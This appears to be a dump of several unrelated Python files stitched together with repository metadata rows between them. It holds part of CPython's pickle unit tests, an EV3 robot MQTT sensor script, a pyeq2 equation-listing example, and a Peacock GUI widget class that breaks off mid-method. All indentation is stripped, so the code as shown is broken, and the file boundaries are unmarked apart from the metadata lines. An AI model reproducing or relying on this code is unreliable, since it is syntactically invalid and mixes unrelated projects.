144: ( MARK
145: X BINUNICODE 'foo'
153: q BINPUT 8
155: K BININT1 1
157: X BINUNICODE 'bar'
165: q BINPUT 9
167: K BININT1 2
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA3 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA4 = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA5 = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA6 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
_testdata = create_data()
def setUp(self):
pass
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assertEqual(expected, got)
def test_load_from_data0(self):
self.assertEqual(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assertEqual(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assertEqual(self._testdata, self.loads(DATA2))
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertTrue(x is x[0])
def test_recursive_tuple(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertEqual(len(x[0]), 1)
self.assertTrue(x is x[0][0])
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertEqual(list(x.keys()), [1])
self.assertTrue(x[1] is x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, 2)
x = self.loads(s)
self.assertEqual(dir(x), dir(i))
self.assertTrue(x.attr is x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def test_get(self):
self.assertRaises(KeyError, self.loads, b'g0\np0')
self.assertEquals(self.loads(b'((Kdtp0\nh\x00l.))'), [(100,), (100,)])
def test_insecure_strings(self):
# XXX Some of these tests are temporarily disabled
insecure = [b"abc", b"2 + 2", # not quoted
## b"'abc' + 'def'", # not a single quoted string
b"'abc", # quote is not closed
b"'abc\"", # open quote and close quote don't match
b"'abc' ?", # junk after close quote
b"'\\'", # trailing backslash
# some tests of the quoting rules
## b"'abc\"\''",
## b"'\\\\a\'\'\'\\\'\\\\\''",
]
for b in insecure:
buf = b"S" + b + b"\012p0\012."
self.assertRaises(ValueError, self.loads, buf)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assertEqual(u2, u)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assertEqual(t2, t)
def test_bytes(self):
for proto in protocols:
for u in b'', b'xyz', b'xyz'*100:
p = self.dumps(u)
self.assertEqual(self.loads(p), u)
def test_ints(self):
import sys
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assertEqual(expected, n2)
n = n >> 1
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assertEqual(got, maxint64)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.assertRaises(ValueError, self.loads, data)
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assertEqual(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assertEqual(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
pass
def test_getinitargs(self):
pass
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
if hasattr(os, "stat"):
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assertEqual(t, u)
# Tests for protocol 2
def test_proto(self):
build_none = pickle.NONE + pickle.STOP
for proto in protocols:
expected = build_none
if proto >= 2:
expected = pickle.PROTO + bytes([proto]) + expected
p = self.dumps(None, proto)
self.assertEqual(p, expected)
oob = protocols[-1] + 1 # a future protocol
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as detail:
self.assertTrue(str(detail).startswith(
"unsupported pickle protocol"))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y, (proto, x, s, y))
expected = expected_opcode[proto, len(x)]
self.assertEqual(opcode_in_pickle(expected, s), True)
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[proto, x]
self.assertEqual(opcode_in_pickle(expected, s), True)
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(tuple(x), tuple(y))
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertTrue(__name__.encode("utf-8") in s1)
self.assertTrue(b"MyList" in s1)
self.assertEqual(opcode_in_pickle(opcode, s1), False)
y = self.loads(s1)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertTrue(__name__.encode("utf-8") not in s2)
self.assertTrue(b"MyList" not in s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
assert isinstance(s, bytes_types)
y = self.loads(s)
self.assertEqual(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertEqual(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_simple_newobj(self):
x = object.__new__(SimpleNewObj) # avoid __init__
x.abc = 666
for proto in protocols:
s = self.dumps(x, proto)
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s), proto >= 2)
y = self.loads(s) # will raise TypeError if __init__ called
self.assertEqual(y.abc, 666)
self.assertEqual(x.__dict__, y.__dict__)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assertEqual(list(x), list(y))
self.assertEqual(x.__dict__, y.__dict__)
self.assertEqual(x.foo, y.foo)
self.assertEqual(x.bar, y.bar)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
def test_bad_getattr(self):
x = BadGetattr()
for proto in 0, 1:
self.assertRaises(RuntimeError, self.dumps, x, proto)
        # Protocol 2 doesn't raise a RuntimeError.
d = self.dumps(x, 2)
self.assertRaises(RuntimeError, self.loads, d)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Protocol 0 is less strict and also accept iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except (pickle.PickleError):
pass
try:
self.dumps(D(), proto)
except (pickle.PickleError):
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, obj,
"Failed protocol %d: %r != %r"
% (proto, obj, loaded))
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA3)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA4)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA5)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "Set-Cookie: key=value")
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA4)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA6)
# Test classes for reduce_ex
class REX_one(object):
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
# No __reduce_ex__ here, but inheriting it from object
class REX_two(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
# No __reduce__ here, but inheriting it from object
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
# Calling base class method should succeed
class REX_five(object):
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
# This one used to fail with infinite recursion
# Test classes for newobj
class MyInt(int):
sample = 1
class MyLong(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
myclasses = [MyInt, MyLong, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(object):
def __init__(self, a, b, c):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, pickle.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, pickle.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
pickle.dump(data, stream)
stream.seek(0)
unpickled = pickle.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 3)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
pickle.dump(123, f, -1)
pickle.dump(123, file=f, protocol=-1)
pickle.dumps(123, -1)
pickle.dumps(123, protocol=-1)
pickle.Pickler(f, -1)
pickle.Pickler(f, protocol=-1)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(pickle.Pickler):
def __init__(self): pass
class BadUnpickler(pickle.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def test_bad_input(self):
# Test issue4298
s = bytes([0x58, 0, 0, 0, 0x54])
self.assertRaises(EOFError, pickle.loads, s)
# Test issue7455
s = b'0'
self.assertRaises(pickle.UnpicklingError, pickle.loads, s)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
else:
return None
def persistent_load(self, oid):
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
self.id_count = 0
self.load_count = 0
L = list(range(10))
self.assertEqual(self.loads(self.dumps(L)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.load_count, 5)
def test_bin_persistence(self):
self.id_count = 0
self.load_count = 0
L = list(range(10))
self.assertEqual(self.loads(self.dumps(L, 1)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.load_count, 5)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
        # Reset the BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
        # Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(3):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
| gpl-3.0 | 7,596,760,899,772,005,000 | 31.299392 | 80 | 0.523479 | false |
yhalk/vw_challenge_ECR | src/ev3/Sensors/sensors.py | 1 | 1535 | import paho.mqtt.client as mqtt
import config
import ev3dev.ev3 as ev3
import IR.IR_control as remoteControl
import ev3control.master as master
from ev3control.messages import *
import time
from MotionCtrl.actuators_simple import actuators
from Sensors.odometry_ev3 import Odometry
#Set IR sensor to remote control mode
ir = remoteControl.InfraredSensor()
ir.mode = "IR-REMOTE"
#Get odometer
odometer = Odometry()
publishable_names_dict = { "IR_control":ir,
config.LARGE_MOTOR_A:actuators[0],
config.LARGE_MOTOR_B:actuators[1],
config.LARGE_MOTOR_D:actuators[2],
config.MEDIUM_MOTOR:actuators[3],
"Odometer":odometer
}
# Make dict where key is sensor name and value
# is a list of all properties of this sensor
items_to_publish = {pub: [] for pub in list(publishable_names_dict.keys())}
for pub_name in list(items_to_publish.keys()):
pub_obj = publishable_names_dict[pub_name]
for member, dtype in pub_obj.__class__.__dict__.items():
if isinstance(dtype, property):
items_to_publish[pub_name].append(member)
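# Illustrative shape of the mapping built above (a sketch only; the actual
# property names depend on the sensor/actuator classes):
#   items_to_publish = {
#       "IR_control": ["<InfraredSensor property>", ...],
#       "Odometer":   ["<Odometry property>", ...],
#       ...
#   }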
def addSensorDevices(client,topic,qos):
    #Use same names as in publishable_names_dict
#Add remote controller
master.publish_cmd(client,topic, AddDeviceMessage("IR_control", "remoteControl.InfraredSensor()"),1,qos=qos)
master.publish_cmd(client,topic, SetAttrMessage("IR_control", "mode","IR-REMOTE"),1,qos=qos)
| apache-2.0 | 4,616,542,250,256,086,000 | 35.547619 | 112 | 0.661889 | false |
JMoravec/unkRadnet | fitToCurve/pyeq2/Examples/Complex/ListAllStandardEquations_2D.py | 1 | 1067 | # Version info: $Id: ListAllStandardEquations_2D.py 1 2012-01-07 22:20:43Z [email protected] $
import os, sys, inspect
if os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..'))
import pyeq2, pyeq2.ExtendedVersionHandlers
if __name__ == "__main__":
for submodule in inspect.getmembers(pyeq2.Models_2D):
if inspect.ismodule(submodule[1]):
for equationClass in inspect.getmembers(submodule[1]):
if inspect.isclass(equationClass[1]):
for extendedVersionName in ['Default', 'Offset']:
if (-1 != extendedVersionName.find('Offset')) and (equationClass[1].autoGenerateOffsetForm == False):
continue
equation = equationClass[1]('SSQABS', extendedVersionName)
print '2D ' + submodule[0] + ' --- ' + equation.GetDisplayName()
print 'Done.' | bsd-3-clause | 7,471,303,952,131,567,000 | 43.5 | 125 | 0.564199 | false |
backmari/moose | python/peacock/Input/ParamsByType.py | 1 | 5164 | from PyQt5.QtWidgets import QWidget, QComboBox, QStackedWidget
from PyQt5.QtCore import pyqtSignal
from peacock.base.MooseWidget import MooseWidget
from peacock.utils import WidgetUtils
from ParamsByGroup import ParamsByGroup
class ParamsByType(QWidget, MooseWidget):
"""
Has a QComboBox for the different allowed types.
On switching type a new ParamsByGroup is shown.
"""
needBlockList = pyqtSignal(list)
blockRenamed = pyqtSignal(object, str)
changed = pyqtSignal()
def __init__(self, block, **kwds):
"""
Constructor.
Input:
block[BlockInfo]: The block to show.
"""
super(ParamsByType, self).__init__(**kwds)
self.block = block
self.combo = QComboBox()
self.types = []
self.type_params_map = {}
self.table_stack = QStackedWidget()
self.type_table_map = {}
for t in sorted(self.block.types.keys()):
self.types.append(t)
params_list = []
for p in self.block.parameters_list:
params_list.append(self.block.parameters[p])
t_block = self.block.types[t]
for p in t_block.parameters_list:
params_list.append(t_block.parameters[p])
self.type_params_map[t] = params_list
self.combo.addItems(sorted(self.block.types.keys()))
self.combo.currentTextChanged.connect(self.setBlockType)
self.top_layout = WidgetUtils.addLayout(vertical=True)
self.top_layout.addWidget(self.combo)
self.top_layout.addWidget(self.table_stack)
self.setLayout(self.top_layout)
self.user_params = []
self.setDefaultBlockType()
self.setup()
def _syncUserParams(self, current, to):
"""
Sync user added parameters that are on the main block into
each type ParamsByGroup.
Input:
current[ParamsByGroup]: The current group parameter table
to[ParamsByGroup]: The new group parameter table
"""
ct = current.findTable("Main")
tot = to.findTable("Main")
if not ct or not tot or ct == tot:
return
# first remove user params in tot
tot.removeUserParams()
params = ct.getUserParams()
tot.addUserParams(params)
idx = ct.findRow("Name")
if idx >= 0:
name = ct.item(idx, 1).text()
idx = tot.findRow("Name")
if idx >= 0:
tot.item(idx, 1).setText(name)
def currentType(self):
return self.combo.currentText()
def save(self):
"""
        Look at the user params in self.block.parameters,
        update the type tables, and save the type on the block.
"""
t = self.getTable()
if t:
t.save()
self.block.setBlockType(self.combo.currentText())
def reset(self):
t = self.getTable()
t.reset()
def getOrCreateTypeTable(self, type_name):
"""
        Get the table for the type name, or create it if it doesn't exist.
Input:
type_name[str]: Name of the type
Return:
ParamsByGroup: The parameters corresponding to the type
"""
t = self.type_table_map.get(type_name)
if t:
return t
t = ParamsByGroup(self.block, self.type_params_map.get(type_name, self.block.orderedParameters()))
t.needBlockList.connect(self.needBlockList)
